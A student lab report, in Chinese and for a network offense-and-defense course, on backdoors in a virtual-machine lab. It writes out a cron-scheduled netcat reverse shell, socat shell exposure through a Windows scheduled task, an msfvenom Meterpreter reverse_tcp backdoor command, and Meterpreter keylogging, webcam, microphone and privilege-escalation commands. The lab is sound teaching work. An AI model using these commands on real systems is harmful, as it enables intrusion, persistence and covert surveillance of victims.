20155227《網絡對抗》Exp2 後門原理與實踐
20155227《網絡對抗》Exp2 後門原理與實踐
基礎問題回答
(1)例舉你能想到的一個後門進入到你系統中的可能方式?
在非官方網站下載軟件時,後門很可能被捆綁在軟件中。
攻擊者利用欺騙的手段,通過發送電子郵件或者文件,並誘使主機的操作員打開或運行藏有木馬程序的郵件或文件,這些木馬程序就會在主機上創建一個後門。
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
- Linux下可以通過cron來啟動
- Windows下在控制面板的管理工具中可以設置任務計劃啟動,或者通過修改註冊表來達到自啟的目的;
(3)Meterpreter有哪些給你映像深刻的功能?
- 獲取攝像頭以及對靶機直接截屏,感覺很方便很厲害的樣子
(4)如何發現自己有系統有沒有被安裝後門?
- 用殺毒軟件進行掃描。
- 檢查端口和進程。
實驗準備(常用後門工具實踐)
Windows獲得Linux Shell
在
Windows
下查看ip
windows
打開監聽
Linux
反彈連接win
windows
下獲得一個linux shell
,可運行任何指令
Linux獲得Win Shell
Linux
運行監聽指令
Windows
反彈連接Linux
Linux
下看到Windows
的命令提示
nc傳輸數據
如圖:
實驗內容及過程
1.使用netcat獲取主機操作Shell,cron啟動
在
Windows
系統下,監聽5227端口。
- 用
crontab -e
指令編輯一條定時任務,在最後一行添加50 * * * * /bin/netcat 192.168.56.1 5227 -e /bin/sh
時間到了之後獲得了
kali
的shell
,可以輸入指令。
2.使用socat獲取主機操作Shell, 任務計劃啟動
在
Windows
系統下,打開控制面板->管理工具->任務計劃程序
,創建任務,填寫任務名稱後,新建一個觸發器:
在操作->程序或腳本中選擇你的
socat.exe
文件的路徑,在添加參數一欄填寫tcp-listen:5227 exec:cmd.exe,pty,stderr
運行剛剛創建的任務:
在kali中輸入指令
socat - tcp:192.168.56.1:5227
cmd shell
:
3.使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
- 將生成的後門程序復制到Windows主機上,也可以通過
nc
指令將生成的後門程序傳送到Windows
主機上 在
Kali
上使用msfconsole
指令進入msf
控制臺,使用監聽模塊,設置payload
,設置反彈回連的IP和端口
:
- 打開
Windows
上的後門程序 此時
Kali
上已經獲得了Windows
主機的連接,並且得到了遠程控制的shell
:
4.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
使用
help
查看指令
使用
record_mic
指令截獲一段音頻:
使用
webcam_snap
指令使用攝像頭進行拍照:
使用
screenshot
指令可以進行截屏:
使用
keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄:
使用
getsystem
指令進行提權,提權失敗(win10):
使用
sysinfo
查詢電腦系統詳細版本信息:
實驗過程中遇到的問題及解決
問題:在設置
payload
過程中出現Handler failed to bind to XXX
的錯誤。
解決:我在生成後門程序時不小心使用的是
Windows
的ip地址,改為kali
的ip(相應的設置也改為kali的ip)之後問題解決。
實驗體會
這次的實驗非常有意思,使用MSF的時候,錄音、截屏、照相、獲取擊鍵記錄的實踐讓我在感到神奇的同時,也意識到我們的系統是很脆弱的。要保護好自己的隱私,就要提高安全意識。
20155227《網絡對抗》Exp2 後門原理與實踐